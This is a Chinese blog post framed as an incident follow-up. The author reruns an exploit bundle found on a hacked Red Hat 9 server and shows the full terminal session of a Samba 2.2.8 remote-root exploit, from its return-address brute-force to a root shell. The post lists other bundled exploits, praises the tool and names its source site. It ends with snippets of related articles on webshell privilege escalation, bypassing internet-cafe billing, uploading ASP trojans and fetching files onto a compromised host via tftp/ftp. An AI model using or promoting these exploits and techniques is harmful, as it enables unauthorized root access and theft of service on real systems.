默认Samba版本在RedHat 9上的溢出获取root演示_漏洞研究

从近日对被黑服务器的安全分析来看,我找到该用户提升权限的工具。他是利用了Samba的安全漏洞提升为了ROOT。

这几天服务器因为要放到公网测试,此时又安装了Samba服务器。结果第二天就发现了服务器被黑

Samba是在Redhat Linux 9上默认的版本。使用了该黑客的强大的exploit工具提升为了root。

提升为root,只需要短短的3秒钟

自己汗一个

从服务器的tmp查找到一个x2k3的目录

[bob@learnin9 tmp]$ cd x2k3/

[bob@learnin9 x2k3]$ ls

bind ftp gkr identd r00t samba

[bob@learnin9 x2k3]$ 

bind ftp gkr identd samba均为目录,r00t为一个程序,让我们来看看r00t程序的执行情况

[bob@learnin9 x2k3]$ ./r00t 

.--------------------------------. 

| x2k3 / 

| Written by Natok / 

+------------------------+----.

| Targets: [1] Samba | <= 2.2.8 

| [2] Bind | 8.3.2 / 8.3.3 / 9.2.1 

| [3] gkrellmd | <2.1.12 

| [4] wu_ftpd | <=2.6.1 

| [5] identd | 1.2 

+------------------------+----.

| http://www.natok.de /

|____________________________/ 

./r00t 

[bob@learnin9 x2k3]$ ./r00t 127.0.0.1 1

[*] Range to scan : 127.0.0.0

[*] Socket Connecting to port : 139

[*] Press control+c for skipping ! 

Port 139 IP 127.0.0.0 -> Connection refused!

Port 139 IP 127.0.0.1 -> Connection ok!

[+] Let's sploit ;-)

samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)

--------------------------------------------------------------

+ Verbose mode.

+ Bruteforce mode. (Linux)

+ Host is running samba.

+ Using ret: [0xbffffed4]

+ Using ret: [0xbffffda8]

+ Using ret: [0xbffffc7c]

+ Using ret: [0xbffffb50]

+ Using ret: [0xbffffa24]

+ Using ret: [0xbffff8f8]

+ Using ret: [0xbffff7cc]

+ Using ret: [0xbffff6a0]

+ Using ret: [0xbffff574]

+ Using ret: [0xbffff448]

+ Using ret: [0xbffff31c]

+ Using ret: [0xbffff1f0]

+ Using ret: [0xbffff0c4]

+ Using ret: [0xbfffef98]

+ Using ret: [0xbfffee6c]

+ Using ret: [0xbfffed40]

+ Using ret: [0xbfffec14]

+ Using ret: [0xbfffeae8]

+ Using ret: [0xbfffe9bc]

+ Using ret: [0xbfffe890]

+ Using ret: [0xbfffe764]

+ Using ret: [0xbfffe638]

+ Using ret: [0xbfffe50c]

+ Using ret: [0xbfffe3e0]

+ Using ret: [0xbfffe2b4]

+ Using ret: [0xbfffe188]

+ Worked!

--------------------------------------------------------------

*** JE MOET JE MUIL HOUWE

Linux learnin9 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux

uid=0(root) gid=0(root) groups=99(nobody)

id

uid=0(root) gid=0(root) groups=99(nobody)

看到了吧。就这么轻易的被夺取为root了。

我这只是localhost方式,其实远程也是一样的直接获取为root了。

请各位好好看看自己的Redhat 9吧。rpm -qa |grep ***** 是不是汗已经出来了?

还有bind gkrellmd wu_ftpd identd这些溢出程序。我不知道这些程序是否就是属于黑客界一些没有公布出来的溢出程序。呵呵!

我的服务器因为没有启动Bind、gkrellmd、wu_ftpd 、identd,只启动了默认安装的samba,而且还是在公网上,所以那个黑客就中奖入侵到我的服务器了。可喜可贺,我也是终于找到了这么好的工具。

自己欢喜一下。去看了一下http://www.natok.de/ 居然发现是中文的网站,究竟里面是谁?很好奇.........

可以说,r00t程序是Natok写的,但是exploit程序不是他写的,他只是将其它的溢出程序分门别类的。做了个友好的界面,不过能搜集到还是很强的。

希望能结识到这个家伙! 

时间: 2024-09-16 14:46:56

默认Samba版本在RedHat 9上的溢出获取root演示_漏洞研究的相关文章

对Serv-U 6.0.0.2默认帐户及密码的一点理解_漏洞研究

今天获得一个webshell.发现了serv-u目录.看了下ServUDaemon.ini  [GLOBAL]  Version=6.0.0.2  OpenFilesDownloadMode=Exclusive  PacketTimeOut=300  LocalSetupPassword=ah6A0ED50ADD0A516DA36992DB43F3AA39  6.0.0.2版的.曾经看到哪说6.0版的默认本地管理帐号和密码依旧是原来那个.可又好像听谁说过6版的密码已经改了..  呵.这里发现.多

网吧破解:让你在网吧上霸王网_漏洞研究

破解万象秘笈   一 用Alt+Ctrl+Del组合键(万象)   开机后,当出现蓝背景时,立即按组合键,弹出"关闭程序"对话框,若里面有"client"后则立即关闭,当发现"未知"程序时也要关闭,因为万象会启动两次.万象被结束了,当然就没有那个讨厌的输入会员卡号的对话框了,那就免费啦!   不过聪明的老板会从主机上看到你的机子处于待机状态,而你却在玩,那可就不好啦! 还是小心为上啊!!   二 利用输入法漏洞(万象)   1 用微软输入法  

upfile上传漏洞的利用总结_漏洞研究

涉及到大部分:如动网  还有星空的NF_visual_upfile.asp 找到 upload.asp 等等上传图片的地方 可以看源代码中有 filepath 或者file,path的字 运行WSockExper抓包 上传一个asp木马 在WSockExper 找到 post -- 的2行 全选 复制到一个txt的文本里   修改: 两个底部都要空一行 把底下的asp 格式修改成gif 格式 -----------------有时要修改上面的数字参数,最好加上空格总数保持原来文件的数目-----

文件上传八大法-远程控制必看_漏洞研究

本文是居于已经得到了一个有一定权限的SHELL.命令行下传送文件的其他方法.   一,TFTP  格式:tftp -i get file.exe path/file.exe           默认存放在system32下,如果指定就存在指定的地方.  二:ftp下载文件   ftp下载文件一般步骤如下:  echo open xxx.xxx.xxx.xxx 〉ftp.txt   echo user 〉〉ftp.txt   echo password 〉〉ftp.txt   echo binar

文件上传漏洞在惠信中的应用_漏洞研究

近来大家为dvbbs的文件上传漏洞兴奋不已,想想在其他的系统里面能不能用的上呢?我就以惠信新闻系统来抛砖引玉吧!  惠信新闻系统3.1 windows2000+sp4  先看这句代码.admin_uploadfilesave.asp  ...............  Server.mappath(formPath&file.FileName)  ............................  保存时用路径+文件名+后缀名,那我们可以用dvbbs上的漏洞了,只不过我们改的是文件名(因

史上MD5解密之最快方法整理(荐)_漏洞研究

一般来说,形如1e4dc79d489e86b2的16位或者32位密码就是经过MD5加密的,(当然也有特殊,比如DVBBS在登陆时候会先产生一个16位的随机密码,当然,这个密码还是和MD5密码的形式有点区别,相同的是都是16位的数字+字母组合 .):  这个一般来说可以用一个叫dv.exe的工具来破解.他可以破解加密前是10位以下的纯数字或者纯字母,破解纯数字的,速度超快,但是纯字母的,就慢了,当然他还有其他功能,但是其他功能没什么特别之处,所以不说.  破解纯数字时候:dv -p a.txt -

在redhat 9 上安装oracle 9.2.0.4 时,DBCA 出错的解决办法

oracle|解决 如何在各种版本的linux 上安装oracle 的资料已经很多了,也介绍的很详细,按说只要按照步骤一步步来,应该不会出现问题.我也曾经在redhat 9 上安装过 oracle 9.2.0.1, 没有出现任何问题.但最近我在redhat 9 上安装 oracle 9.2.0.4( 这个版本是OTN上可以下载的,9.2.0.1的下载链接已经没有了)时,在最后使用DBCA创建数据库时,出现了以下的错误:      click finish, 弹出确认画面,click ok, 这时

在 RedHat Linux 上做性能调优

在 RedHat Linux 上做性能调优 性能调优的目的是提高系统性能,减少电力消耗,或者减轻某个应用对系统中其它应用的影响.但是如果贸然地,没有适当的手段进行系统调优,那可能会产生负面效果. 如果我们有系统有计划地进行性能调优,那么它就会成为严谨的科学探索而不是随心所欲的艺术行为. 具体方法 首先我们需要弄明白"正常"的系统性能情形是什么样的. 查找潜在的性能问题并进行参数调优来修复.观察这些调整对系统的影响并决定是否确认保持这种调整或者恢复到调整前的状态. 概要: 收集数据,建立

svn-服务器回滚导致部署在上面的SVN版本比我电脑上的版本低

问题描述 服务器回滚导致部署在上面的SVN版本比我电脑上的版本低 然后提交也提交不了,同步不了 svn: E160006: No such revision 491 请问如何处理,主要是同步不了不知道那些是有不同的,删除服务器上版本在上传本地又太麻烦,很多项目 解决方案 可以强制check in提交你本地的来覆盖服务器的.因为你也没什么办法来比较了